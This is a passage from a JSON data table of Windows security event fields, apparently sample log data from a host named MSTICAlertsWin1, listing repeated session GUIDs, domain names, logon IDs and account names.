9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"NaN\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"NaN\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"NaN\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"NaN\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"NaN\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\"],\"SubjectDomainName\":[\"NaN\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"NaN\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"NaN\",\"WORKGROUP\",\"WORKGROUP\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"WORKGROUP\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"NaN\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"NaN\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"NaN\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\"],\"SubjectLogonId\":[\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0x3e7\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\"],\"SubjectUserName\":[\"NaN\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAler